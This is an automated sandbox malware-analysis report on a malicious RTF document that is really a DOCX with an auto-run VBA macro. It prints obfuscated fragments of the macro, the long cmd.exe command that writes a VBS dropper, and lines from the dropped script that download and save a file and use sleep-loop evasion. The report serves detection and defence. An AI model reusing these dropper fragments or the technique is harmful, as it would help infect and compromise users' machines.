Analysis Report

Overview

General Information

Joe Sandbox Version:	17.0.0
Analysis ID:	204882
Start time:	17:38:44
Joe Sandbox Product:	Cloud
Start date:	12.01.2017
Overall analysis duration:	0h 4m 39s
Report type:	full
Sample file name:	k-25ss9tv61sm78f_35s.rtf
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal84.evad.expl.winRTF@6/14@0/0
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .rtf Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	84	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely requires more UI automation

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Show sources

Source: winword.exe

Memory has grown: Private usage: 0MB later: 67MB

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Networking:

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE	String found in binary or memory: file://
Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: WINWORD.EXE	String found in binary or memory: file:///c:/k-25ss9tv61sm78f_35s.rtf
Source: WINWORD.EXE	String found in binary or memory: file:///c:/k-25ss9tv61sm78f_35s.rtf&
Source: WINWORD.EXE	String found in binary or memory: file:///c:/k-25ss9tv61sm78f_35s.rtf8
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/sofwilliams/appdata/local/microsoft/office/winword.exe_rules.xml
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/sofwilliams/appdata/local/microsoft/office/winword.exe_rules.xml=
Source: WINWORD.EXE	String found in binary or memory: file:///c:/users/sofwilliams/appdata/local/microsoft/office/winword.exe_rules.xmleta/
Source: WINWORD.EXE	String found in binary or memory: ftp://
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: http://
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/stat/images/onedriveupsell.png
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesignupupsell
Source: WINWORD.EXE	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesignupupsellz
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesyncclientupsell
Source: WINWORD.EXE	String found in binary or memory: http://cdn.odc.officeapps.live.com/odc/xml?resource=onedrivesyncclientupsell9n
Source: WINWORD.EXE	String found in binary or memory: http://cdp1.public-trust.com/crl/omniroot2025.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: WINWORD.EXE	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: WINWORD.EXE	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: WINWORD.EXE	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE	String found in binary or memory: http://fontfabrik.comq
Source: WINWORD.EXE	String found in binary or memory: http://ns.ad
Source: WINWORD.EXE	String found in binary or memory: http://ns.adbe.
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0%
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0-
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com0/
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.comodoca.com05
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net03
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.entrust.net0d
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.msocsp.com0=
Source: WINWORD.EXE	String found in binary or memory: http://ocsp.msocsp.com0n
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: http://odc.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: WINWORD.EXE	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides_g
Source: WINWORD.EXE	String found in binary or memory: http://p
Source: WINWORD.EXE	String found in binary or memory: http://schemas.d5
Source: WINWORD.EXE	String found in binary or memory: http://w
Source: WINWORD.EXE	String found in binary or memory: http://w$
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: WINWORD.EXE	String found in binary or memory: http://www.ascendercorp.com/
Source: WINWORD.EXE	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: WINWORD.EXE	String found in binary or memory: http://www.bethmardutho.org.p
Source: WINWORD.EXE	String found in binary or memory: http://www.c-and-g.co.jp
Source: WINWORD.EXE	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WINWORD.EXE	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers/
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmln
Source: WINWORD.EXE	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: WINWORD.EXE	String found in binary or memory: http://www.fonts.com
Source: WINWORD.EXE	String found in binary or memory: http://www.founder.com.cn/cn
Source: WINWORD.EXE	String found in binary or memory: http://www.founder.com.cn/cn/
Source: WINWORD.EXE	String found in binary or memory: http://www.galapagosdesign.com/
Source: WINWORD.EXE	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: WINWORD.EXE	String found in binary or memory: http://www.ibq
Source: WINWORD.EXE	String found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: WINWORD.EXE	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: WINWORD.EXE	String found in binary or memory: http://www.sakkal.com
Source: WINWORD.EXE	String found in binary or memory: http://www.sandoll.co.kr
Source: WINWORD.EXE	String found in binary or memory: http://www.tiro.com;copyright
Source: WINWORD.EXE	String found in binary or memory: http://www.typography.netd
Source: WINWORD.EXE	String found in binary or memory: http://www.u
Source: WINWORD.EXE	String found in binary or memory: http://www.urwpp.de
Source: WINWORD.EXE	String found in binary or memory: http://www.usertrust.com1
Source: WINWORD.EXE	String found in binary or memory: http://www.zhongyicts.com.cn
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://api.aadrm.com/
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: WINWORD.EXE	String found in binary or memory: https://apis.live.net/v5.0/ne&
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://broadcast.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://contacts.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://directory.services.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://excelcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://excelps.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://login.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorize61e2d24043c256f1e26330120
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorize7
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeadalclientidexceb01ca
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizekshu()
Source: WINWORD.EXE	String found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://nexus.
Source: WINWORD.EXE	String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules2-
Source: WINWORD.EXE	String found in binary or memory: https://nexus.officeapps.live.comom/config15/5
Source: WINWORD.EXE	String found in binary or memory: https://nexusrules.officeapps.live.com/nexus/rules?application=winword.exe&version=15.0.4691.1000&is
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://ocws.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://odc.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://officeapps.live.com
Source: WINWORD.EXE	String found in binary or memory: https://officeapps.live.compa
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://ols.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/partnerprovisioning.svc/v1/subscriptions
Source: WINWORD.EXE	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/partnerprovisioning.svc/v1/subscriptionsg
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/wlx.profiles.ic.json
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://pptcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://pptps.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://pptss.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://pptwrs.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://profile.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://roaming.
Source: WINWORD.EXE	String found in binary or memory: https://secure.comodo.com/cps0
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://signup.
Source: config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://ssl.bing.com/dict/?view=officemoe&ulang=zh-cn&tlang=en-us
Source: WINWORD.EXE	String found in binary or memory: https://ssl.bing.com/dict/?view=officemoe&ulang=zh-cn&tlang=en-us
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://ssl.bing.com/dict/img/bingdict_e2c.png
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://wordcs.
Source: WINWORD.EXE, config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4693&crev=20.756.dr	String found in binary or memory: https://wordps.

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\sofwilliams\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FE7CF12F-DC55-49BA-9499-E672B79FE3F5}.tmp

Found strings which match to known social media urls

Show sources

Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: WINWORD.EXE	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Potential malicious VBS script found (has network functionality)

Show sources

Source: C:\Windows\System32\cmd.exe	Dropped file: XkSvP.SEtRequeSTheaDer RM7H("1F5409572A","QM5g0OA"),RM7H("3320022422644371686A5B","AQYv")
Source: C:\Windows\System32\cmd.exe	Dropped file: FH XkSvP.rEspoNseBoDY
Source: C:\Windows\System32\cmd.exe	Dropped file: XkSvP.sEtrEqUeSTHEaDEr RM7H("332E0F2804","Oa"),RM7H("542A4628456E077D0F601F","M6S2")
Source: C:\Windows\System32\cmd.exe	Dropped file: If XkSvP.StatUSTeXT=RM7H("2350304D252E1F110156223B165F36","Os1B9L") tHEn FH XkSvP.responSeBODy
Source: C:\Windows\System32\cmd.exe	Dropped file: M5.sAVetoFiLe DxF3znV,5206-5204

Persistence and Installation Behavior:

Command shell drops VBS files

Show sources

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\sofwilliams\AppData\Roaming\21924.vbs

Data Obfuscation:

Obfuscated document found, RTF is a DOCX

Show sources

Source: k-25ss9tv61sm78f_35s.rtf

Initial file: Document starts with PK

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\Upgrades

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Window found: window name: SysTabControl32

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\15.0\ClickToRun

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office 15\Root\Office15\MSVCR100.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wscript.pdb source: wscript.exe
Source:	Binary string: P:\Target\x86\ship\word\x-none\msword.pdb source: WINWORD.EXE
Source:	Binary string: wscript.pdbN source: wscript.exe

Classification label

Show sources

Source: classification engine

Classification label: mal84.evad.expl.winRTF@6/14@0/0

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\sofwilliams\AppData\Roaming\Microsoft\Office\Recent\k-25ss9tv61sm78f_35s.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File created: C:\Users\SOFWIL~1\AppData\Local\Temp\CVR9231.tmp

Executes visual basic scripts

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /V /C set 'GBG=C:\Users\sofwilliams\AppData\Roaming\%RANDOM%.vbs' && (for %i in ('DIm DxF3znV' 'FunCTIoN RM7H(TqP,SUpcFxy)' 'BCGW2=65' 'dIM Qiw,O2ErlP,PEd4' 'Qo1rh7B=85' 'fOr Qiw=1 tO (Len(TqP)/2)' 'O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))' 'PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))' 'RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))' 'NEXt' 'RCTUfL=22' 'EnD fUncTIOn' 'Cllae0=23' 'KyzlwC' 'sUB KyzlwC()' 'OF=45' 'DIm Tw,Jl,WC8fC' 'Ui=84' 'Tw=96824294' 'KNatGfc=89' 'FOr Jl=1 tO Tw' 'WC8fC=WC8fC+1' 'NexT' 'Xt=77' 'iF WC8fC=Tw Then' 'Ep8UXJ=64' 'Mule6z((1336770/4951))' 'DFyX5SF=24' 'PbE0o(RM7H('2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30','WCM'))' 'N08kbpy=70' 'eLsE' 'TeDg=46' 'SG5Ave=28' 'EnD iF' 'TSoUPG=33' 'EnD suB' 'FUnCTIoN XtPB7z2(C9NbQom)' 'PkAKI0E=14' 'XtPB7z2=Chr(C9NbQom)' 'LK=15' 'eND FuNCTiON' 'SuB Wusodn4()' 'XuOFto5=43' 'Dim UQFOGB, KJk' 'For UQFOGB = 38 To 9000267' 'KJk = RyQrP + 83 +

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE
Source: unknown	Process created: C:\Windows\System32\cmd.exe
Source: unknown	Process created: C:\Windows\System32\wscript.exe
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /V /C set 'GBG=C:\Users\sofwilliams\AppData\Roaming\%RANDOM%.vbs' && (for %i in ('DIm DxF3znV' 'FunCTIoN RM7H(TqP,SUpcFxy)' 'BCGW2=65' 'dIM Qiw,O2ErlP,PEd4' 'Qo1rh7B=85' 'fOr Qiw=1 tO (Len(TqP)/2)' 'O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))' 'PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))' 'RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))' 'NEXt' 'RCTUfL=22' 'EnD fUncTIOn' 'Cllae0=23' 'KyzlwC' 'sUB KyzlwC()' 'OF=45' 'DIm Tw,Jl,WC8fC' 'Ui=84' 'Tw=96824294' 'KNatGfc=89' 'FOr Jl=1 tO Tw' 'WC8fC=WC8fC+1' 'NexT' 'Xt=77' 'iF WC8fC=Tw Then' 'Ep8UXJ=64' 'Mule6z((1336770/4951))' 'DFyX5SF=24' 'PbE0o(RM7H('2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30','WCM'))' 'N08kbpy=70' 'eLsE' 'TeDg=46' 'SG5Ave=28' 'EnD iF' 'TSoUPG=33' 'EnD suB' 'FUnCTIoN XtPB7z2(C9NbQom)' 'PkAKI0E=14' 'XtPB7z2=Chr(C9NbQom)' 'LK=15' 'eND FuNCTiON' 'SuB Wusodn4()' 'XuOFto5=43' 'Dim UQFOGB, KJk' 'For UQFOGB = 38 To 9000267' 'KJk = RyQrP + 83 +
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\sofwilliams\AppData\Roaming\21924.vbs'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Document contains embedded VBA macros

Show sources

Source: k-25ss9tv61sm78f_35s.rtf

OLE indicator, VBA macros: true

Document misses a certain OLE stream usually present in this Microsoft Office document type

Show sources

Source: k-25ss9tv61sm78f_35s.rtf

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Reads the hosts file

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

File read: C:\Windows\System32\drivers\etc\hosts

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: k-25ss9tv61sm78f_35s.rtf	OLE, VBA macro line: Private Sub DocumeNt_OPen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function DocumeNt_OPen			Name: DocumeNt_OPen

Document contains an embedded VBA macro which may execute processes

Show sources

Source: k-25ss9tv61sm78f_35s.rtf	OLE, VBA macro line: DFfKIT.Run B6BznN, ((587 - 42) - (3682020 / 6756)), ((1675644 / 5942) - (6865 - 6583))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function K9, API IWshShell3.Run("cmd.exe /V /C set "GBG=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm DxF3znV" "FunCTIoN RM7H(TqP,SUpcFxy)" "BCGW2=65" "dIM Qiw,O2ErlP,PEd4" "Qo1rh7B=85" "fOr Qiw=1 tO (Len(TqP)/2)" "O2ErlP=(XtPB7z2((-3701+3739)) & XtPB7z2((524880/7290))&(mId(TqP,(Qiw+Qiw)-1,2)))" "PEd4=(MZrD(Mid(SUpcFxy,((Qiw moD LEn(SUpcFxy))+1),1)))" "RM7H=RM7H+XtPB7z2(KLGYdz(O2ErlP,PEd4))" "NEXt" "RCTUfL=22" "EnD fUncTIOn" "Cllae0=23" "KyzlwC" "sUB KyzlwC()" "OF=45" "DIm Tw,Jl,WC8fC" "Ui=84" "Tw=96824294" "KNatGfc=89" "FOr Jl=1 tO Tw" "WC8fC=WC8fC+1" "NexT" "Xt=77" "iF WC8fC=Tw Then" "Ep8UXJ=64" "Mule6z((1336770/4951))" "DFyX5SF=24" "PbE0o(RM7H("2B39233377786C28342C3B362F29222F223E3163342C2078253A79293D30","WCM"))" "N08kbpy=70" "eLsE" "TeDg=46" "SG5Ave=28" "EnD iF" "TSoUPG=33" "EnD suB" "FUnCTIoN XtPB7z2(C9NbQom)" "PkAKI0E=14" "XtPB7z2=Chr(C9NbQom)" "LK=15" "eND FuNCTiON" "SuB Wusodn4()" "XuOFto5=43" "Dim UQFOGB, KJk" "For UQFOGB = 38 To 9000267" "KJk = RyQrP + 83 + 80 + 90" "Next" "DVYff=			Name: K9

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: k-25ss9tv61sm78f_35s.rtf	OLE, VBA macro line: Set DFfKIT = CreateObject(Ks86hO(C9og3f, UGc))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function K9, String createobject: Set DFfKIT = CreateObject(Ks86hO(C9og3f, UGc))			Name: K9

Potential malicious VBS script found (suspicious strings)

Show sources

Source: C:\Windows\System32\cmd.exe	Dropped file: SEt BwZn=cREaTeOBject(RM7H("1E21343D24322767213F2A212E",VW))
Source: C:\Windows\System32\cmd.exe	Dropped file: sET RAOx=crEATEobjECT(RM7H("161E2D24043C256F1E26330120",CNlxWn))
Source: C:\Windows\System32\cmd.exe	Dropped file: Set OAmVp=RAOx.ENVirOnMeNT(RM7H("33250E20321230","Acw"))
Source: C:\Windows\System32\cmd.exe	Dropped file: SeT XkSvP=crEatEobJEcT(RM7H("052A113B27301D2F3C6D2A04040B261D18",EPNWwO))
Source: C:\Windows\System32\cmd.exe	Dropped file: SeT XkSvP= creatEoBJECt(RM7H("7E1B19375C011523475C22087F3A2E1163",PQMM))
Source: C:\Windows\System32\cmd.exe	Dropped file: SEt M5=createObJECt(RM7H("071C091C0476152C343D2735",Y9zz983))
Source: C:\Windows\System32\cmd.exe	Dropped file: sET GH7=cREaTEobjEct(RM7H("002431302538253D206D1F3C2029003E302D302103312D263A21", "LSGCYUL"))
Source: C:\Windows\System32\cmd.exe	Dropped file: sEt AdyAC=GH7.CREaTETextFile(NUa,239-238,3016-3016)

Very long command line found

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process created: Commandline size = 4511
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 4511

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: WINWORD.EXE, wscript.exe	Binary or memory string: Program ManagerX
Source: WINWORD.EXE, wscript.exe	Binary or memory string: Progman
Source: WINWORD.EXE, wscript.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\cmd.exe

Memory protected: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\wscript.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Potential evasive VBS script found (sleep loop)

Show sources

Source: C:\Windows\System32\cmd.exe	Dropped file: Do WhIle NgoLmHV<>5317-5316 WSCript.sLEEP(28)
Source: C:\Windows\System32\cmd.exe	Dropped file: dO whIle TiMeR<LpZsh wSCRiPt.Sleep(2)

Potential evasive VBS script found (use of timer() function in loop)

Show sources

Source: C:\Windows\System32\cmd.exe

Dropped file: dO whIle TiMeR<LpZsh

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries time zone information

Show sources

Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Error!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Software Vulnerabilities:

Networking:

Persistence and Installation Behavior:

Data Obfuscation:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot